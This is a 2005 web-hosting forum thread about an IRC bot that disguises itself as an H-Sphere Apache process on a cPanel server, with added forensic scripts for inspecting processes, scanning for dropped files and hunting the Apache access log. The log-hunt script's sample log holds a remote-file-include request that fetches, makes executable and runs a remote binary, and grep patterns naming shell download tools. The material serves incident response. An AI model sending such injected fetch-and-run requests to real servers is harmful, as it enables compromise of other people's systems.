Web Hosting Talk

Cpanel crashes after /hsphere/shared/apache/bin/httpd -DSSL...


TimmiT.nl
09-02-2005, 04:39 AM
My Cpanel server crashed today:

When I look back in my logs I see that one process is eating all my CPU:
/hsphere/shared/apache/bin/httpd -DSSL
(running as nobody and connecting to irc servers)

I don't run Hsphere and the program/directory doesn't exist!
I don't have any old phpBB forums and I am running PHP 4.4.0, so I don't think it is a gap in my PHP.

What is that program? How does it run? And how do I fix this problem?

Any ideas?

Thanks!

KDAWebServices
09-02-2005, 06:04 AM
Sounds like you've been hit with a rootkit (by virtue of you not being able to see the directory) that is trying to pass itself off as the HSphere HTTP process.

TimmiT.nl
09-02-2005, 06:33 AM
rkhunter doesn't show any rootkit, and neither does chkrootkit.

And a rootkit running as nobody can't do anything, or am I wrong?

KDAWebServices
09-02-2005, 06:58 AM
The clue is in the name: if there's an RK on it, then it means they've exploited something local and got root. In this case, it could just be that they've exploited a weak PHP script, uploaded their IRC bot, executed it, and deleted the executable, hence why you can't find it.
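
The "executed it, then deleted the executable" case is the one the reply above describes, and it is also why the process name is all the thread has to go on. The following script is an added example, not code from the thread or from cPanel or H-Sphere: it reads the suspect process through /proc on Linux (cmdline, the real executable, working directory, uid, open sockets) and copies the executable out of /proc before the process is killed, because the kernel still holds the unlinked inode. The pid and the evidence path are assumed arguments; processes owned by nobody have to be inspected as root.

```sh
#!/bin/sh
# Added example (not from the thread): inspect a suspicious running process
# through /proc and preserve its executable even after the attacker unlinked
# it. Linux only; the pid is an assumed argument. Run as root for processes
# owned by another account such as nobody.

inspect_process() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    # argv as the kernel stores it (NUL-separated). A spoofed name such as
    # /hsphere/shared/apache/bin/httpd lives here, not on disk.
    printf 'cmdline: '; tr '\0' ' ' < "/proc/$pid/cmdline"; echo
    # The real binary. A trailing "(deleted)" means the file was unlinked
    # after exec, which is why a search of the filesystem finds nothing.
    printf 'exe:     %s\n' "$(readlink "/proc/$pid/exe")"
    # Working directory is usually the drop location (/tmp, /dev/shm, a
    # world-writable image directory).
    printf 'cwd:     %s\n' "$(readlink "/proc/$pid/cwd")"
    # Real uid; nobody/apache means the process came in through the web stack.
    printf 'uid:     %s\n' "$(awk '/^Uid:/ {print $2}' "/proc/$pid/status")"
    # Number of open sockets (IRC is normally 6667/tcp, but any port is possible).
    printf 'sockets: %s\n' "$(ls -l "/proc/$pid/fd" 2>/dev/null | grep -c socket:)"
}

# Copy the executable out of /proc before killing the process: the kernel
# still holds the inode even though the directory entry is gone. Prints a
# checksum so the copy can be tied to the incident notes.
preserve_exe() {
    pid=$1; dest=$2
    cp "/proc/$pid/exe" "$dest" && chmod 0400 "$dest" || return 1
    sha256sum "$dest" 2>/dev/null || md5sum "$dest"
}

# Usage: sh inspect.sh <pid>
# then:  preserve_exe <pid> /root/evidence/httpd.bin   (before kill)
if [ "$#" -gt 0 ]; then
    inspect_process "$1"
fi
```

Run inspect_process first and preserve_exe second; killing the process first drops the last reference to the unlinked binary and the sample is gone.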

TimmiT.nl
09-02-2005, 07:47 AM
Yes, but there aren't other things installed as root or anything.

I have removed it, and it doesn't run anymore.

Is there a fix for Apache to stop uploads through weak PHP scripts?

iseletsk
09-02-2005, 12:22 PM
It has been brought to our attention that certain exploit scripts are installing an IRC binary on servers that makes it look like an H-Sphere Apache process. This is not related to H-Sphere. The script tries to spoof itself as an H-Sphere Apache process.

dynamicnet
09-02-2005, 03:56 PM
Greetings:

FYI: Rootkit Hunter and chkrootkit only detect rootkits.

A lot of the latest attacks do not use rootkits, but work through vulnerabilities in PHP, CGI, etc., along with insecure operating systems and partitions.

Check /tmp, /var/tmp (and if on Linux-based, /dev/shm) for suspicious files.

Also check for httpd-owned files in your users' images directories; /var/spool/samba can be a spot as well.

Thank you.
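
The checks listed in the post above, written out as a script. This is an added example and not the poster's own tooling: scratch directories are walked for files owned by the web-server account that are executable or hidden, and the document roots are walked for scripts or executables that the web-server account itself owns, which on a shared host means a web application wrote them. The account name (nobody on this box) and the directory lists are assumed arguments.

```sh
#!/bin/sh
# Added example (not from the thread): triage scratch directories and web
# roots for files dropped through a weak PHP/CGI script. Account name and
# paths are assumed arguments; run as root to see every home directory.

scan_scratch_dirs() {
    # $1: account the web server runs as (nobody, apache, www-data);
    # remaining args: directories to scan (/tmp /var/tmp /dev/shm ...).
    user=$1; shift
    for d in "$@"; do
        [ -d "$d" ] || continue
        # -xdev: stay on one filesystem; -perm -100: owner-executable;
        # -name '.*': dot-files, a common name for a dropped bot.
        find "$d" -xdev -user "$user" -type f \( -perm -100 -o -name '.*' \) 2>/dev/null
    done
}

scan_webroot() {
    # $1: web-server account; remaining args: document roots to walk.
    user=$1; shift
    for d in "$@"; do
        [ -d "$d" ] || continue
        # Site owners upload over FTP/SFTP as themselves, so anything the
        # httpd account owns got there through a web application. A script
        # or executable in an images directory is the classic sign.
        find "$d" -xdev -user "$user" -type f \
            \( -name '*.php' -o -name '*.cgi' -o -name '*.pl' -o -name '*.sh' -o -perm -100 \) \
            2>/dev/null
    done
}

# Typical run on the box in the thread:
#   scan_scratch_dirs nobody /tmp /var/tmp /dev/shm /var/spool/samba
#   scan_webroot nobody /home
```

Anything the scan lists should be copied aside with its timestamps (cp -p) before it is removed, so the upload time can be matched against the Apache access log.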

Steven
09-03-2005, 09:55 AM
It's just a spoof... I would look into reading the Apache logs for possible ways it was exploited, install mod_security, etc. Also, it's not a good idea to remove the files UNTIL you know how they got there, for forensics purposes.
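
Reading the Apache logs for the way in, as the reply above suggests, is mostly a matter of knowing what a 2005-era PHP break-in looks like on the wire: a parameter that points at a remote URL (remote file include), shell tools and scratch directories in the query string. The script below is an added example, not something from the thread or from mod_security: it greps an access log for those three patterns and tallies hits per client address. The log path is an assumed argument; the sample log it writes is constructed for the demo and uses documentation addresses only.

```sh
#!/bin/sh
# Added example (not from the thread): first pass over an Apache access log
# for the request patterns that dropped bots like the one in this thread.
# Log path is an assumed argument; the sample log is constructed with
# RFC 5737 documentation addresses.

hunt_access_log() {
    # $1: access log in common or combined format.
    # Pattern 1: query parameter set to a remote URL (remote file include).
    # Pattern 2: shell tools followed by an encoded space (command injection).
    # Pattern 3: references to the usual drop directories.
    grep -E -i \
        -e '[?&][a-z0-9_]+=(https?|ftp)(%3a|:)' \
        -e '(wget|curl|lynx|fetch|chmod|perl|uname)(%20|\+)' \
        -e '/(tmp|var/tmp|dev/shm)/' \
        "$1"
}

attacking_hosts() {
    # Hits per client address, busiest first; feeds the firewall rule and
    # the abuse report.
    hunt_access_log "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

write_sample_log() {
    # Constructed sample: one include-URL probe, one injected command line
    # that fetches and runs a bot named "httpd", and three benign requests.
    cat > "$1" <<'EOF'
10.0.0.5 - - [02/Sep/2005:03:14:07 +0200] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
192.0.2.44 - - [02/Sep/2005:03:15:21 +0200] "GET /forum/index.php?inc=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.803"
192.0.2.44 - - [02/Sep/2005:03:15:39 +0200] "GET /forum/index.php?inc=http://203.0.113.9/cmd.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.9/httpd;chmod%20%2Bx%20httpd;./httpd HTTP/1.1" 200 1044 "-" "libwww-perl/5.803"
10.0.0.7 - - [02/Sep/2005:03:16:02 +0200] "GET /images/logo.gif HTTP/1.1" 200 2301 "http://www.example.com/" "Mozilla/5.0"
10.0.0.9 - - [02/Sep/2005:03:17:45 +0200] "POST /contact.php HTTP/1.1" 200 210 "http://www.example.com/contact.php" "Mozilla/5.0"
EOF
}

# Real run:  hunt_access_log /path/to/access_log
# Demo:      write_sample_log /tmp/sample_log && attacking_hosts /tmp/sample_log
```

The patterns are deliberately broad; a hit is a lead to read in context, not a verdict. POST bodies are not logged by default, so an upload through a form will only show as a POST to the vulnerable script followed by a GET of the file it wrote.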